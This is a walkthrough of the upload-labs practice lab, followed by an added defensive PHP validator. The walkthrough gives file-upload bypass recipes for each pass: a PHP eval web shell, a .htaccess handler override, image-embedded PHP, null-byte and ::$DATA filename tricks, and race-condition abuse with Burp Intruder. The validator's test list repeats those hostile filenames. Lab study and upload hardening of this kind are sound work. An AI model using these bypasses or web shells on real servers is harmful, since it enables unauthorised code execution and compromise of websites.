Pass-01
Upload a PHP file like test_info.php with content:
<?php echo phpinfo(); ?>
This fails due to client-side JavaScript validation. Three bypass methods:
- Disable JS: In Firefox, press F12 → Debugger → Settings → Disable JavaScript. Re-upload the file and access via copied image link.
- Modify HTML locally: Save page source as custom_upload.html, remove JS validation blocks, add an action attribute pointing to the original target directory, and open the local file to upload.
- Burp Suite interception: Capture the upload request in Burp, change filename extension back to .php, then forward.
Pass-02
This uses server-side MIME type check (validating Content-Type). Capture a .php file upload request, modify Content-Type to image/jpeg, image/png, or image/gif.
Pass-03
Blacklist validation for specific PHP extensions. Use alternative PHP extensions parsed in some environments (e.g., .php5). Create test_03.php5, upload it, and modify Apache’s httpd.conf (if needed) to map .php5 to PHP interpreter:
AddType application/x-httpd-php .php .phtml .php5 .php3
Pass-04
Strict extension blacklist; use .htaccess override. Create a .htaccess file:
AddType application/x-httpd-php .bmp
Upload a PHP-embedded BMP file (shell.bmp) followed by this .htaccess. Accessing shell.bmp will execute PHP.
Pass-05
Blacklist validation without case conversion check. Upload test_05.Php directly.
Pass-06
Blacklist validation without trailing whitespace trimming. Capture a .php file upload request, append a space to the filename (e.g., test_06.php ).
Pass-07
Blacklist validation without trailing dot trimming. Capture a .php file upload request, append a dot to the filename (e.g., test_07.php.).
Pass-08
Blacklist validation without ::$DATA stream filter handling. Capture a .php file upload request, append ::$DATA to the filename (e.g., test_08.php::$DATA).
Pass-09
Validation chain runs only once. Capture a .php file upload request, rename to test_09.phP. ., which remains valid after single validation pass.
Pass-10
Single-pass extension blacklist that deletes forbidden strings. Rename the file to test_10.pphphp; the middle "php" is deleted, leaving .php.
Pass-11
White-list validation with %00 null byte truncation. Conditions:
- PHP < 5.3.4
- magic_quotes_gpc = OFF
Capture a valid .png upload, modify save_path to include test_11.php%00.
Pass-12
White-list validation via POST with %00 URL-decoded truncation. Capture a valid .png upload, modify POSTed save_path to include URL-encoded %00 (i.e., %2500), then rename to test_12.php.
Pass-13
Image header check. Create an image-embedded PHP file:
- Open a valid JPG/PNG/GIF in Notepad, append
<?php eval($_POST['x']); ?>
- Or use CMD
copy test_img.jpg /b + test_shell.php /a shell_13.jpg
Upload via white-list and execute via file inclusion vulnerability (e.g., ?file=./upload/shell_13.jpg).
Pass-14
Uses getimagesize() image signature check. Modify a valid image’s first bytes to match a known header (e.g., prepend GIF89a to a PHP-embedded BMP).
Pass-15
Uses exif_imagetype() image signature check. Enable PHP’s exif extension, then create and upload an image with valid EXIF + PHP content.
Pass-16
Image re-rendering (destroys PHP code in standard image-embedded files). Use Beyond Compare to compare original and re-rendered images, identify unmodified regions, and inject PHP code there. Alternatively, use pre-made bypass images.
Pass-17
Race condition exploit: valid files are renamed, invalid are deleted. Capture a PHP file (test_17.php) upload request in Burp, send to Intruder, set to infinite payloadless requests, and continuously refresh the file’s URL (e.g., http://localhost/upload-labs/upload/test_17.php).
Pass-18
Race condition with image suffix requirement. Modify 18th pass’s myupload.php to fix upload path errors, create an image-embedded PHP file (shell_18.gif), and repeat Burp Intruder + infinite refresh exploit.
Pass-19
Filename validation ignores trailing /.. Capture an image upload (test_19.png), modify POSTed save_name to test_19.php/.. Alternatively, use %00 truncation if PHP < 5.3.
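
The filename tricks in Pass-03 through Pass-12 and Pass-19 all work because the server blacklists or "cleans" a client-supplied name. The PHP below is an added example, not code from upload-labs or this walkthrough, showing the defensive counterpart: a strict allow-list that rejects instead of cleaning, takes the type from the file's bytes, and generates the stored name server-side. The function name stored_name_for and all sample inputs are constructed for illustration.

```php
<?php
// Added example (not upload-labs code): allow-list check on a strictly parsed name.
const ALLOWED = ['jpg' => 'image/jpeg', 'png' => 'image/png', 'gif' => 'image/gif'];

/**
 * Return a server-generated storage name for an upload, or null to reject.
 * $clientName is the untrusted filename; $tmpPath is the uploaded temp file.
 */
function stored_name_for(string $clientName, string $tmpPath): ?string
{
    // Reject rather than clean: stripping or trimming is what Pass-06..10 rely on.
    // Exactly one base name and one extension, nothing else.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})\z/', $clientName, $m)) {
        return null; // spaces, trailing dots, ::$DATA, "/.", NUL bytes, .htaccess
    }
    $ext = strtolower($m[1]); // case-insensitive comparison (Pass-05)
    if (!array_key_exists($ext, ALLOWED)) {
        return null; // allow-list, so .php5, .phtml and .pphphp never pass
    }
    // Type comes from the file's bytes, never from the request's Content-Type (Pass-02).
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if ($mime !== ALLOWED[$ext]) {
        return null;
    }
    // The stored name is generated server-side; no client string reaches the path.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed sample: a GIF header followed by PHP, as in Pass-13/14.
$tmp = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($tmp, "GIF89a\x01\x00\x01\x00\x00\x00\x00;<?php /* payload */ ?>");

// Constructed filenames modelled on the ones used in the passes above.
$names = ['test_03.php5', 'test_05.Php', 'test_06.php ', 'test_07.php.',
          'test_08.php::$DATA', 'test_09.phP. .', 'test_10.pphphp',
          "test_11.php\0.png", 'test_19.php/.', '.htaccess', 'shell_13.gif'];
foreach ($names as $n) {
    $r = stored_name_for($n, $tmp);
    printf("%-26s %s\n", json_encode($n), $r === null ? 'rejected' : "stored as $r");
}
unlink($tmp);
```

Only shell_13.gif is accepted, because a signature check cannot see the PHP that follows the header. That file becomes executable only through the file inclusion or handler mapping described in Pass-04 and Pass-13, which is why uploads should also be re-encoded and stored outside the web root.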